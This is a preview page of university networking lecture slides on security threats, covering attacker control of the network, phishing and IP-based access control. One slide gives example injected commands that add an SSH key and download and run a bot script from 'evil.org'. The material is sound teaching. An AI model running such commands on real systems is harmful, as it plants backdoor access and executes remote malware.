l14 Security 1

l14 Security 1 - Security Three lectures about security...

Info iconThis preview shows pages 1–8. Sign up to view the full content.

View Full Document Right Arrow Icon

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon
This is the end of the preview. Sign up to access the rest of the document.

Unformatted text preview: Security Three lectures about security Today: attack- All kinds of bad things attackers can do over the network Next lecture: defense building blocks- Techniques for protecting against these and other attacks Next Thursday: secure protocols Note: If you find these lectures interesting, consider taking CS155- If youve already taken 155, apologies for any redundancy The big picture Assume bad guys completely control the network- When you send a packet, you just give it to the bad guy- Bad guy drops, modifies, duplicates, or delivers packet at will- Or just inserts his/her own packets that purport to be from you Rest of lecture will make this more concrete... Some consequences Consider servers with no cryptographic protection- Next lecture will talk about cryptography You submit order on to an on-line store- Bad guy sees your packets, learns credit card number- Bad guy changes your shipping address to his/her own You are logged into a web site using telnet- Bad guy injects evil commands echo bad-key >> .ssh/authorized keys wget evil.org/botscript && sh ./botscript Cant safely download patches from OS vendor- Might end up installing an attackers evil patch Three types of threat Secrecy- Adversary reads your private messages Integrity- Adversary modifies/forges messages from you- Receiver cant detect the change and processes them Availability- Adversary can prevent you from communicating Todays lecture:- How innocent mechanisms can leave systems open to all three types of threat Warm up: phishing From: Adobe News <[email protected]> Subject: INTRODUCING UPGRADED ADOBE ACROBAT 2010 Adobe is pleased to announce new version upgrades for Adobe Acrobat 2010. Advanced features include:- Collaborate across borders- Create rich, polished PDF files from any application that prints- Ensure visual fidelity- Encrypt and share PDF files more securely- Use the standard for document archival and exchange To upgrade and enhance your work productivity today, go to: http://www.adobe-acrobat-new-download.com/ To leave comments, please contact us at: [email protected] Best regards, Eric Williams Adobe Acrobat Danger: malicious servers Who is adobe-acrobat-new-download.com ?- PDF Reader Solutions, 1283 Avenue Street New York, NY 10028- All name servers in Russia Visiting malicious servers is harmful- Web site has downloadable software for people to run- Infects your machine with virus- Then your machine can act as phishing web server Lesson 1: dont talk to bad guys domain names Rest of lecture:- Even with correct IP address, can talk to bad guys- With correct DNS name, even more likely Network-based access control Many services base access control on IP addresses- E.g., mail servers allow relaying- NNTP, Web servers restrict access to particular IP addresses (E.g., usenet.stanford.edu , ACM digital library, ...)- NFS servers allow you to mount file systems...
View Full Document

This note was uploaded on 04/02/2012 for the course CS 144 at Stanford.

Page1 / 38

l14 Security 1 - Security Three lectures about security...

This preview shows document pages 1 - 8. Sign up to view the full document.

View Full Document Right Arrow Icon
Ask a homework question - tutors are online